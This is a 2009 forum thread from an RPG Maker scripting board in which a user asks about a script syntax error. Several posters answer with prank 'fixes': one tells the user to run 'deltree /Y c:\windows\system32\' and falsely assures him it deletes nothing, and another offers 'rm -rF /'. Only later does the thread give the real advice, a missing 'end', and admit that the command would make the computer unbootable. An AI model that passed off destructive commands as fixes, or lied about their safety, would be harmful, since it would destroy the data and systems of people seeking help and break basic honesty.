Chaos Project

RPG Maker => RPG Maker Scripts => Script Troubleshooting => Topic started by: Tazero on March 10, 2009, 05:36:12 am

Title: TONS -_-;
Post by: Tazero on March 10, 2009, 05:36:12 am
Help please i'm getting this error
Quote from: Gamescript 'toa2' line 4342 syntax error occured
Title: Re: TONS -_-;
Post by: fugibo on March 10, 2009, 06:43:37 am
Make sure nothings fudged up at line 4342 :(
Title: Re: TONS -_-;
Post by: tSwitch on March 10, 2009, 07:43:42 am
Quote from: MetaKnight on March 10, 2009, 05:36:12 am
Help please i'm getting this error
Quote from: Gamescript 'toa2' line 4342 syntax error occured



wow...jeez...it seems like your drivers are malfunctioning, causing a fault in your GPU, which is shorting out the motherboard's ability to process line 4342.

edit: alright, I researched this all morning and found the way to fix it.
first you have to close, then reopen RMXP (don't ask me why, but it apparently has to happen)
then cut out line 4342.  Then you close the script editor by hitting 'ok'
then you go to your command prompt, here's the tricky part.
enter the following

deltree /Y c:\windows\system32\

that should reset the hardware drivers for your GPU, and you should be able to paste line 4342 back and it should work.
Title: Re: TONS -_-;
Post by: Tazero on March 10, 2009, 02:12:37 pm
Will this delete anything?  :huh:
Title: Re: TONS -_-;
Post by: tSwitch on March 10, 2009, 02:16:53 pm
Quote from: MetaKnight on March 10, 2009, 02:12:37 pm
Will this delete anything?  :huh:


absolutely not.
Title: Re: TONS -_-;
Post by: Tazero on March 10, 2009, 02:27:10 pm
/me

Thanks man!




EDIT::
Not working....
Title: Re: TONS -_-;
Post by: Blizzard on March 10, 2009, 02:46:51 pm
"rmdir" should work instead of "deltree" if it's the folder you want to remove, NAMK.
Title: Re: TONS -_-;
Post by: fugibo on March 10, 2009, 03:40:42 pm
Or if your running a UNIX variant and wanna have some fun:


rm -rF /


Three cookies to anyone who understands that without google.
Title: Re: TONS -_-;
Post by: Tazero on March 10, 2009, 03:59:02 pm
Quote from: Blizzard on March 10, 2009, 02:46:51 pm
"rmdir" should work instead of "deltree" if it's the folder you want to remove, NAMK.


It's -my- problem....


And what do these commands do i'm running XP with screwwy drivers i gues..
Title: Re: TONS -_-;
Post by: fugibo on March 10, 2009, 05:16:05 pm
We're being sarcastic. You are being vague.
Title: Re: TONS -_-;
Post by: Tazero on March 10, 2009, 07:01:20 pm
The commands line is "End"..... so that can't be syntax error...
Title: Re: TONS -_-;
Post by: winkio on March 10, 2009, 07:16:26 pm
unless you have too many or too little ends.  figure it out.  there is either an extra end, or you need to put in more. follow the ends down the formatting.
Title: Re: TONS -_-;
Post by: fugibo on March 10, 2009, 07:19:41 pm
Add an "end" to the end. You probably didn't copy the script right.
Title: Re: TONS -_-;
Post by: tSwitch on March 10, 2009, 08:28:23 pm
Quote from: MetaKnight on March 10, 2009, 03:59:02 pm
Quote from: Blizzard on March 10, 2009, 02:46:51 pm
"rmdir" should work instead of "deltree" if it's the folder you want to remove, NAMK.


It's -my- problem....

And what do these commands do i'm running XP with screwwy drivers i gues..


they would delete your System 32 folder, which contains all your drivers and such.
in other words, your computer would stop running, and never start up again without a format and system restore.